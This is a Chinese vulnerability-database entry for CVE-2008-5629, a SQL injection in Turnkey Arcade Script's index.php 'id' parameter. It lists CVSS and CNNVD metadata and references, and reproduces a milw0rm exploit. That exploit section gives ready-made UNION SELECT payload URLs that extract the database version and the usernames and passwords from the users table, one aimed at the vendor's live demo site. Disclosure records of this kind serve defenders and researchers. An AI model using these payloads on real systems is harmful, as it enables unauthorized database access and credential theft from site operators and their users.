Turnkey Arcade Script 'id' Parameter SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116839 漏洞类型 SQL注入
发布时间 2008-11-27 更新时间 2008-12-17
CVE编号 CVE-2008-5629 CNNVD-ID CNNVD-200812-321
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7256
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-321
|漏洞详情
TurnkeyArcadescript是一款非常流行的游戏脚本用于网络游戏之间的互联。TurnkeyArcade脚本的index.php中存在SQL注入漏洞。远程攻击者可以借助一个播放操作中的id参数,执行任意SQL指令
|漏洞EXP
----------------Mor0ccan Nightmares----------------

------------------------------
Script: Turnkey Arcade Script-
------------------------------

-----------------------------------
Site: http://www.turnkeyarcade.com-
-----------------------------------

-----------------------------------------------------------
Author: The_5p3ctrum <sp3@linuxmail.org> <5p@linuxmail.org>-
-----------------------------------------------------------


-----------------------------------------------------------------------
Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-
-----------------------------------------------------------------------
---
Ex:
---

http://localhost/index.php?action=play&id=[sql]
http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users

--------
exploit:
--------

http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users

-----
Demo:
-----

http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users

-------
Greetz:
-------

Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...

# milw0rm.com [2008-11-27]
|参考资料

来源:XF
名称:arcadescript-index-sql-injection(46935)
链接:http://xforce.iss.net/xforce/xfdb/46935
来源:BID
名称:32511
链接:http://www.securityfocus.com/bid/32511
来源:SECUNIA
名称:32890
链接:http://secunia.com/advisories/32890
来源:MILW0RM
名称:7256
链接:http://milw0rm.com/exploits/7256